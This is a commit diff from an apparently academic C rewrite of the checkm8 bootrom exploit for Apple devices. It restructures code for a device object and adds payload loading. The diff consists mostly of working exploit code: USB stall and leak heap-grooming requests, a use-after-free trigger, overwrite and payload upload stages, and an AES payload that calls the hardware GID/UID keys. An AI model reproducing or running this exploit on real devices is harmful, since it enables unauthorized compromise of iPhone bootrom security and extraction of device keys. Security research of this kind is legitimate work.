grg/checkm8_tool
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

A whole lot of changes to make the code more device-oriented

Browse Source
This commit is contained in:
Gregor Haas
2019-12-10 16:25:11 -05:00
parent 572ce57230
commit 941c476251
13 changed files with 311 additions and 258 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
CMakeLists.txt
View File

@@ -3,9 +3,8 @@ project(ipwndfu_rewrite_c)
enable_language(C)
include_directories(include)
include_directories(checkm8_libusb/src)
add_library(checkm8_libusb
include/checkm8_config.h include/libusb_config.h
checkm8_libusb/src/core.c checkm8_libusb/src/descriptor.c checkm8_libusb/src/hotplug.c
checkm8_libusb/src/io.c checkm8_libusb/src/strerror.c checkm8_libusb/src/sync.c
checkm8_libusb/src/hotplug.h include/libusb.h checkm8_libusb/src/libusbi.h checkm8_libusb/src/version.h

5
checkm8_payloads/CMakeLists.txt
View File

@@ -7,8 +7,9 @@ set(CMAKE_ASM_COMPILER /usr/bin/aarch64-linux-gnu-as)
set(CMAKE_OBJCOPY /usr/bin/aarch64-linux-gnu-objcopy)
set(CMAKE_C_FLAGS "-nostdlib -O")
set(PAYLOADS payload_aes)
add_executable(payload_aes aes.c)
set(PAYLOADS payload_aes payload_sysreg)
add_executable(payload_aes src/aes.c)
add_executable(payload_sysreg src/sysreg.c)
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/bin)
foreach(BINARY ${PAYLOADS})

57
checkm8_payloads/aes.c
View File

@@ -1,57 +0,0 @@
#include "brfunc_aes.h"
#include "brfunc_timing.h"
#include "brfunc_sep.h"
__attribute__ ((section (".payload_text")))
int aes_hw_crypto_command(unsigned int cmd,
void *src,
void *dst,
int len,
unsigned int opts,
void *key,
void *iv)
{
int seeded;
long start = 0, timeout = 0;
CLOCK_GATE(0x3C, 1);
seeded = DPA_SEEDED();
if(!seeded)
{
SEP_CREATE_SEND_DPA_MESSAGE();
start = SYSTEM_TIME();
while(!seeded && !timeout)
{
seeded = DPA_SEEDED();
timeout = TIME_HAS_ELAPSED(start, 1000);
}
}
if(timeout) return -1;
unsigned int key_command = CREATE_KEY_COMMAND(0, 0, 0, 0, 1, 0, 0, 0);
*rAES_INT_STATUS = 0x20;
*rAES_CONTROL = 1;
PUSH_COMMAND_KEY(key_command, key);
PUSH_COMMAND_IV(0, 0, 0, iv);
PUSH_COMMAND_DATA(0, 0, src, dst, len);
PUSH_COMMAND_FLAG(0, 1, 1);
WAIT_FOR_COMMAND_FLAG();
*rAES_CONTROL = 2;
CLOCK_GATE(0x3C, 0);
return 0;
}
int _start(unsigned int cmd,
void *src,
void *dst,
int len,
unsigned int opts,
void *key,
void *iv)
{
return aes_hw_crypto_command(cmd, src, dst, len, opts, key, iv);
}

6
checkm8_remote/CMakeLists.txt
View File

@@ -2,9 +2,11 @@ set(CMAKE_C_STANDARD 99)
set(CMAKE_C_FLAGS -g)
include_directories(include)
add_executable(checkm8_remote main.c src/libusb_helpers.c src/commands.c src/exploit.c src/payload.c)
add_executable(checkm8_remote main.c src/libusb_helpers.c src/exploit.c src/payload.c src/command.c)
add_custom_command(TARGET checkm8_remote POST_BUILD
COMMAND ln
ARGS -s ${PROJECT_SOURCE_DIR}/checkm8_payloads/bin ${CMAKE_CURRENT_SOURCE_DIR}/bin/payloads)
ARGS -s -f -n
${PROJECT_SOURCE_DIR}/checkm8_payloads/bin
${CMAKE_CURRENT_SOURCE_DIR}/bin/payloads)
target_link_libraries(checkm8_remote checkm8_libusb pthread udev)

41
checkm8_remote/include/checkm8.h
View File

@@ -1,14 +1,43 @@
#ifndef IPWNDFU_REWRITE_C_CHECKM8_H
#define IPWNDFU_REWRITE_C_CHECKM8_H
int exploit_device();
#include "checkm8_config.h"
#define AES_ENCRYPT 16
#define AES_DECRYPT 17
#define CHECKM8_SUCCESS 0
#define CHECKM8_FAIL_NODEV -1
#define CHECKM8_FAIL_NOEXP -2
#define AES_GID_KEY 0x2000200
#define AES_UID_KEY 0x2000201
#define IS_CHECKM8_FAIL(code) code < 0
int aes(unsigned char *source, unsigned char *target, int encrypt, int key);
#if CHECKM8_PLATFORM == 8010
#define DEV_IDVENDOR 0x05AC
#define DEV_IDPRODUCT 0x1227
#else
#error "Unspported checkm8 platform"
#endif
struct libusb_device_bundle
{
struct libusb_context *ctx;
struct libusb_device *device;
struct libusb_device_handle *handle;
struct libusb_device_descriptor *descriptor;
};
struct pwned_device
{
enum
{
DEV_NORMAL,
DEV_PWNED
} status;
unsigned int idVendor;
unsigned int idProduct;
struct libusb_device_bundle *bundle;
};
struct pwned_device *exploit_device();
void free_device(struct pwned_device *dev);
#endif //IPWNDFU_REWRITE_C_CHECKM8_H

28
checkm8_remote/include/libusb_helpers.h
View File

@@ -1,35 +1,31 @@
#ifndef IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H
#define IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H
#include "libusb-1.0/libusb.h"
#include "checkm8.h"
struct libusb_device_bundle
{
struct libusb_device *device;
struct libusb_device_handle *handle;
struct libusb_device_descriptor descriptor;
};
#define LIBUSB_MAX_PACKET_SIZE 0x800
int get_test_device(libusb_context *usb_ctx, struct libusb_device_bundle *bundle);
int get_device_bundle(struct pwned_device *dev);
int release_device_bundle(struct pwned_device *dev);
void libusb1_async_ctrl_transfer(libusb_device_handle *handle,
void libusb1_async_ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
unsigned int timeout);
void libusb1_no_error_ctrl_transfer(libusb_device_handle *handle,
void libusb1_no_error_ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
unsigned int timeout);
void stall(libusb_device_handle *handle);
void leak(libusb_device_handle *handle);
void no_leak(libusb_device_handle *handle);
void stall(struct pwned_device *dev);
void leak(struct pwned_device *dev);
void no_leak(struct pwned_device *dev);
void usb_req_stall(libusb_device_handle *handle);
void usb_req_leak(libusb_device_handle *handle);
void usb_req_no_leak(libusb_device_handle *handle);
void usb_req_stall(struct pwned_device *dev);
void usb_req_leak(struct pwned_device *dev);
void usb_req_no_leak(struct pwned_device *dev);
#endif //IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H

7
checkm8_remote/include/payload.h
View File

@@ -1,4 +1,11 @@
#ifndef IPWNDFU_REWRITE_C_PAYLOAD_H
#define IPWNDFU_REWRITE_C_PAYLOAD_H
typedef enum
{
PAYLOAD_AES
} PAYLOAD_T;
struct payload *get_payload(PAYLOAD_T p);
#endif //IPWNDFU_REWRITE_C_PAYLOAD_H

8
checkm8_remote/main.c
View File

@@ -3,11 +3,11 @@
int main()
{
int status = exploit_device();
if(status != 0)
struct pwned_device *dev = exploit_device();
if(dev == NULL)
{
printf("Failed to checkm8_remote device\n");
return status;
printf("Failed to exploit device\n");
return -1;
}
}

46
checkm8_remote/src/command.c Normal file
View File

@@ -0,0 +1,46 @@
#include "checkm8.h"
#include "libusb_helpers.h"
#include "libusb.h"
void dfu_send_data(struct libusb_device_bundle *bundle, unsigned char *data, long data_len)
{
long index = 0, amount;
while(index < data_len)
{
if(data_len - index >= LIBUSB_MAX_PACKET_SIZE) amount = LIBUSB_MAX_PACKET_SIZE;
else amount = data_len - index;
libusb_control_transfer(bundle->handle, 0x21, 1, 0, 0, &data[index], amount, 5000);
index += amount;
}
}
static unsigned char nullbuf[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
int command(struct pwned_device *dev, void *data, long data_len, void *response, long response_len)
{
struct libusb_device_bundle bundle;
int ret = get_device_bundle(&bundle);
if(IS_CHECKM8_FAIL(ret))
{
return ret;
}
dfu_send_data(&bundle, nullbuf, 16);
libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, NULL, 0, 100);
libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, NULL, 0, 100);
libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, NULL, 6, 100);
dfu_send_data(&bundle, (unsigned char *) data, data_len);
if(response_len == 0)
{
libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response, response_len + 1, 100);
}
else
{
libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response, response_len, 100);
}
}

75
checkm8_remote/src/commands.c
View File

@@ -1,75 +0,0 @@
#include <string.h>
#include <stdio.h>
#include "libusb_helpers.h"
#include "checkm8.h"
#define EXEC_MAGIC 0x6365786563657865
#define DONE_MAGIC 0x656e6f64656e6f64
#define MEMC_MAGIC 0x636d656d636d656d
#define MEMS_MAGIC 0x736d656d736d656d
int command(unsigned char *request_data, int request_len, unsigned char *response_buf, int response_len)
{
libusb_context *usb_ctx = NULL;
struct libusb_device_bundle bundle;
libusb_init(&usb_ctx);
get_test_device(usb_ctx, &bundle);
unsigned char nullbuf[16];
memset(nullbuf, '\0', 16);
libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, nullbuf, 16, 5000);
libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, nullbuf, 0, 100);
libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, request_data, request_len, 5000);
if(response_len == 0)
{
libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, 1, 5000);
return 0;
}
else
{
libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, request_len, 5000);
return 0;
}
}
int execute(unsigned long *args, int nargs, unsigned char *response_buf, int response_len)
{
unsigned char cmd_buf[8 * (nargs + 1)];
unsigned long exec = EXEC_MAGIC;
memcpy(cmd_buf, &exec, 8);
memcpy(&cmd_buf[8], args, 8 * nargs);
return command(cmd_buf, 8 * (nargs + 1), response_buf, response_len);
}
int aes(unsigned char *source, unsigned char *target, int encrypt, int key)
{
unsigned long args[10];
args[0] = 0x10000C8F4; // AES crypto command
args[1] = encrypt;
args[2] = 0x1800b0048; // cmd_data_address(7)
args[3] = 0x1800B0010; // cmd_data_address(0)
args[4] = 128; // length of the data
args[5] = key;
args[6] = 0;
args[7] = 0;
memcpy(&args[8], source, 16);
unsigned char response[32];
int ret = execute(args, 10, response, 32);
memcpy(target, &response[16], 16);
for(int i = 0; i < 16; i++)
{
printf("%02x", target[i]);
}
return ret;
}

129
checkm8_remote/src/exploit.c
View File

@@ -1,132 +1,151 @@
#include "checkm8.h"
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include "libusb_helpers.h"
#include "libusb.h"
int complete_stage(int stage_function(struct libusb_device_bundle *bundle))
typedef int(stage_function)(struct pwned_device *dev);
int complete_stage(struct pwned_device *device, stage_function *func)
{
libusb_context *usb_ctx = NULL;
struct libusb_device_bundle usb_bundle;
int ret;
libusb_init(&usb_ctx);
ret = get_test_device(usb_ctx, &usb_bundle);
if(ret != 0)
ret = get_device_bundle(device);
if(ret == CHECKM8_FAIL_NODEV)
{
printf("Error: could not find test device\n");
return ret;
return CHECKM8_FAIL_NODEV;
}
libusb_open(usb_bundle.device, &usb_bundle.handle);
libusb_set_auto_detach_kernel_driver(usb_bundle.handle, 1);
ret = stage_function(&usb_bundle);
libusb_close(usb_bundle.handle);
libusb_exit(usb_ctx);
ret = func(device);
release_device_bundle(device);
return ret;
}
int stage1_function(struct libusb_device_bundle *bundle)
int stage1_function(struct pwned_device *dev)
{
printf("~~~ Exploit stage 1 ~~~\n");
unsigned int i;
stall(bundle->handle);
stall(dev);
for(i = 0; i < 5; i++)
{
no_leak(bundle->handle);
no_leak(dev);
}
usb_req_leak(bundle->handle);
no_leak(bundle->handle);
usb_req_leak(dev);
no_leak(dev);
libusb_reset_device(bundle->handle);
return 0;
libusb_reset_device(dev->bundle->handle);
return CHECKM8_SUCCESS;
}
int stage2_function(struct libusb_device_bundle *bundle)
int stage2_function(struct pwned_device *dev)
{
printf("~~~ Exploit stage 2 ~~~\n");
unsigned char databuf[0x800];
memset(databuf, 'A', 0x800);
libusb1_async_ctrl_transfer(bundle->handle, 0x21, 1, 0, 0, databuf, 0x800, 1);
libusb1_no_error_ctrl_transfer(bundle->handle, 0x21, 4, 0, 0, NULL, 0, 0);
libusb1_async_ctrl_transfer(dev, 0x21, 1, 0, 0, databuf, 0x800, 1);
libusb1_no_error_ctrl_transfer(dev, 0x21, 4, 0, 0, NULL, 0, 0);
libusb_reset_device(bundle->handle);
return 0;
libusb_reset_device(dev->bundle->handle);
return CHECKM8_SUCCESS;
}
int stage3_function(struct libusb_device_bundle *bundle)
int stage3_function(struct pwned_device *dev)
{
printf("~~~ Exploit stage 3 ~~~\n");
unsigned char overwrite_buf[1524];
FILE *overwrite_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/overwrite.bin", "r");
FILE *overwrite_file = fopen(
"/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/overwrite.bin", "r");
fread(overwrite_buf, 1524, 1, overwrite_file);
fclose(overwrite_file);
unsigned char payload_buf[2400];
FILE *payload_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/payload.bin", "r");
FILE *payload_file = fopen(
"/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/payload.bin", "r");
fread(payload_buf, 2400, 1, payload_file);
fclose(payload_file);
usb_req_stall(bundle->handle);
usb_req_leak(bundle->handle);
usb_req_stall(dev);
usb_req_leak(dev);
libusb1_no_error_ctrl_transfer(bundle->handle, 0, 0, 0, 0, overwrite_buf, 1524, 100);
libusb1_no_error_ctrl_transfer(bundle->handle, 0x21, 1, 0, 0, payload_buf, 2048, 100);
libusb1_no_error_ctrl_transfer(bundle->handle, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100);
libusb1_no_error_ctrl_transfer(dev, 0, 0, 0, 0, overwrite_buf, 1524, 100);
libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, payload_buf, 2048, 100);
libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100);
libusb_reset_device(bundle->handle);
return 0;
libusb_reset_device(dev->bundle->handle);
return CHECKM8_SUCCESS;
}
int check_function(struct libusb_device_bundle *bundle)
int check_function(struct pwned_device *dev)
{
unsigned char serial_buf[128];
unsigned int i;
struct libusb_device_handle *handle = bundle->handle;
struct libusb_device_descriptor desc = bundle->descriptor;
struct libusb_device_handle *handle = dev->bundle->handle;
struct libusb_device_descriptor *desc = dev->bundle->descriptor;
libusb_get_string_descriptor_ascii(handle, desc.iSerialNumber, serial_buf, sizeof(serial_buf));
libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, sizeof(serial_buf));
printf("Found device with serial %s\n", serial_buf);
for(i = 0; i < 13; i++)
{
if(serial_buf[99 + i] != "PWND:[checkm8]"[i])
{
return 1;
return CHECKM8_FAIL_NOEXP;
}
}
return 0;
return CHECKM8_SUCCESS;
}
int exploit_device()
struct pwned_device *exploit_device()
{
int ret = complete_stage(check_function);
if(ret == 0) return ret;
struct pwned_device *res = calloc(1, sizeof(struct pwned_device));
res->status = DEV_NORMAL;
res->bundle = calloc(1, sizeof(struct libusb_device_bundle));
res->idVendor = DEV_IDVENDOR;
res->idProduct = DEV_IDPRODUCT;
ret = complete_stage(stage1_function);
if(ret == 0)
int ret = complete_stage(res, check_function);
if(IS_CHECKM8_FAIL(ret))
{
ret = complete_stage(stage2_function);
free_device(res);
return NULL;
}
ret = complete_stage(res, stage1_function);
if(ret == CHECKM8_SUCCESS)
{
ret = complete_stage(res, stage2_function);
usleep(500000);
}
if(ret == 0)
if(ret == CHECKM8_SUCCESS)
{
ret = complete_stage(stage3_function);
ret = complete_stage(res, stage3_function);
usleep(500000);
}
if(ret == 0)
if(ret == CHECKM8_SUCCESS)
{
ret = complete_stage(check_function);
ret = complete_stage(res, check_function);
}
return ret;
if(ret == CHECKM8_SUCCESS)
{
res->status = DEV_PWNED;
return res;
}
else return NULL;
}
void free_device(struct pwned_device *dev)
{
release_device_bundle(dev);
free(dev);
}

116
checkm8_remote/src/libusb_helpers.c
View File

@@ -1,44 +1,96 @@
#include "libusb_helpers.h"
#include "libusb.h"
#include "checkm8.h"
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
int get_test_device(libusb_context *usb_ctx, struct libusb_device_bundle *bundle)
#include "../../checkm8_libusb/src/libusbi.h"
int get_device_bundle(struct pwned_device *dev)
{
if(dev->bundle->ctx == NULL)
{
dev->bundle->ctx = malloc(sizeof(libusb_context));
libusb_init(&dev->bundle->ctx);
}
else
{
if(dev->bundle->descriptor != NULL &&
dev->bundle->descriptor->idVendor == dev->idVendor &&
dev->bundle->descriptor->idProduct == dev->idProduct)
{
return LIBUSB_SUCCESS;
}
}
libusb_device **usb_device_list = NULL;
int usb_dev_count, ret = 1;
int usb_dev_count, ret = LIBUSB_ERROR_NO_DEVICE;
usb_dev_count = libusb_get_device_list(usb_ctx, &usb_device_list);
usb_dev_count = libusb_get_device_list(dev->bundle->ctx, &usb_device_list);
libusb_device *usb_device = NULL;
libusb_device_handle *usb_handle = NULL;
struct libusb_device_descriptor usb_desc = {0};
dev->bundle->device = NULL;
dev->bundle->handle = NULL;
dev->bundle->descriptor = malloc(sizeof(struct libusb_device_descriptor));
for(unsigned int i = 0; i < usb_dev_count; i++)
{
usb_device = usb_device_list[i];
libusb_get_device_descriptor(usb_device, &usb_desc);
dev->bundle->device = usb_device_list[i];
libusb_get_device_descriptor(dev->bundle->device, dev->bundle->descriptor);
if(usb_desc.idVendor == 0x05AC && usb_desc.idProduct == 0x1227)
if(dev->bundle->descriptor->idVendor == dev->idVendor &&
dev->bundle->descriptor->idProduct == dev->idProduct)
{
ret = 0;
ret = LIBUSB_SUCCESS;
break;
}
}
libusb_free_device_list(usb_device_list, usb_dev_count);
if(ret == 0)
if(ret == LIBUSB_SUCCESS)
{
bundle->device = usb_device;
bundle->handle = usb_handle;
bundle->descriptor = usb_desc;
libusb_open(dev->bundle->device, &dev->bundle->handle);
libusb_set_auto_detach_kernel_driver(dev->bundle->handle, 1);
}
else
{
libusb_exit(dev->bundle->ctx);
free(dev->bundle->ctx);
free(dev->bundle->descriptor);
dev->bundle->ctx = NULL;
dev->bundle->device = NULL;
dev->bundle->handle = NULL;
dev->bundle->descriptor = NULL;
}
return ret;
}
int release_device_bundle(struct pwned_device *dev)
{
if(dev->bundle->handle != NULL)
{
libusb_close(dev->bundle->handle);
}
dev->bundle->device = NULL;
if(dev->bundle->ctx != NULL)
{
libusb_exit(dev->bundle->ctx);
free(dev->bundle->ctx);
}
if(dev->bundle->descriptor != NULL)
{
free(dev->bundle->descriptor);
dev->bundle->descriptor = NULL;
}
return LIBUSB_SUCCESS;
}
void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer)
{
printf("transfer status: %s (%i / %i)\n",
@@ -47,7 +99,7 @@ void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer)
transfer->length);
}
void libusb1_async_ctrl_transfer(libusb_device_handle *handle,
void libusb1_async_ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
@@ -62,7 +114,7 @@ void libusb1_async_ctrl_transfer(libusb_device_handle *handle,
struct libusb_transfer *usb_transfer = libusb_alloc_transfer(0);
libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, data_len);
memcpy(&usb_transfer_buf[8], data, data_len);
libusb_fill_control_transfer(usb_transfer, handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1);
libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1);
ret = libusb_submit_transfer(usb_transfer);
if(ret != 0)
@@ -90,7 +142,7 @@ void libusb1_async_ctrl_transfer(libusb_device_handle *handle,
}
}
void libusb1_no_error_ctrl_transfer(libusb_device_handle *handle,
void libusb1_no_error_ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
@@ -102,7 +154,7 @@ void libusb1_no_error_ctrl_transfer(libusb_device_handle *handle,
if(recipient == 1 && rqtype == (2u << 5u))
{
unsigned short interface = wIndex & 0xFFu;
ret = libusb_claim_interface(handle, interface);
ret = libusb_claim_interface(dev->bundle->handle, interface);
if(ret > 0)
{
printf("%s\n", libusb_error_name(ret));
@@ -110,7 +162,7 @@ void libusb1_no_error_ctrl_transfer(libusb_device_handle *handle,
}
}
ret = libusb_control_transfer(handle, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
printf("%s\n", libusb_error_name(ret));
}
@@ -180,39 +232,39 @@ static unsigned char data_0x0_0xC0_buf[192] =
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0
};
void stall(libusb_device_handle *handle)
void stall(struct pwned_device *dev)
{
libusb1_async_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A,
libusb1_async_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A,
data_0xA_0xC0_buf, 0xC0, 1);
}
void leak(libusb_device_handle *handle)
void leak(struct pwned_device *dev)
{
libusb1_no_error_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A,
libusb1_no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A,
data_0x0_0xC0_buf, 0xC0, 1);
}
void no_leak(libusb_device_handle *handle)
void no_leak(struct pwned_device *dev)
{
libusb1_no_error_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A,
libusb1_no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A,
data_0xA_0xC1_buf, 0xC1, 1);
}
void usb_req_stall(libusb_device_handle *handle)
void usb_req_stall(struct pwned_device *dev)
{
unsigned char data[0];
libusb1_no_error_ctrl_transfer(handle, 0x2, 3, 0, 0x80, data, 0, 1);
libusb1_no_error_ctrl_transfer(dev, 0x2, 3, 0, 0x80, data, 0, 1);
}
void usb_req_leak(libusb_device_handle *handle)
void usb_req_leak(struct pwned_device *dev)
{
libusb1_no_error_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A,
libusb1_no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A,
data_0x0_0x40_buf, 0x40, 1);
}
void usb_req_no_leak(libusb_device_handle *handle)
void usb_req_no_leak(struct pwned_device *dev)
{
libusb1_no_error_ctrl_transfer(handle, 0x80, 6, 0x304, 0x40A,
libusb1_no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A,
data_0x0_0x41_buf, 0x41, 1);
}

48
checkm8_remote/src/payload.c
View File

@@ -1,14 +1,48 @@
#include "../include/payload.h"
#include "payload.h"
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
void read_elf_header(const char *filename)
struct payload
{
Elf64_Ehdr header;
FILE *file = fopen(filename, "rb");
if(file)
char *path;
unsigned char *data;
long len;
};
struct payload *get_payload(PAYLOAD_T p)
{
FILE *payload_file;
struct payload *res;
char *path;
switch(p)
{
fread(&header, 1, sizeof(header), file);
case PAYLOAD_AES:
path = "blehblehbleh";
break;
default:
return NULL;
}
res = malloc(sizeof(struct payload));
if(res == NULL) return NULL;
if((payload_file = fopen(path, "rb")) == NULL)
{
free(res);
return NULL;
}
fseek(payload_file, 0, SEEK_END);
res->path = path;
res->len = ftell(payload_file);
res->data = malloc(res->len);
rewind(payload_file);
fread(res->data, 1, res->len, payload_file);
fclose(payload_file);
return res;
}